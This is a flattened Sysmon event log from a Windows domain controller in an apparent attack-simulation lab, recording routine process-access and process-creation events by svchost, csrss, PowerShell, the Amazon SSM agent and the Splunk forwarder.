13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.420{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.419{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.419{08A6967A-4298-6000-3000-000000009A01}23763668C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.419{08A6967A-429D-6000-6900-000000009A01}856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{08A6967A-4298-6000-3000-000000009A01}2376C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.274{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6800-000000009A01}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.274{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-429D-6000-6800-000000009A01}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-429D-6000-6700-000000009A01}27482596C:\Windows\system32\cmd.exe{08A6967A-429D-6000-6800-000000009A01}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.273{08A6967A-429D-6000-6800-000000009A01}4040C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6700-000000009A01}2748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.259{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|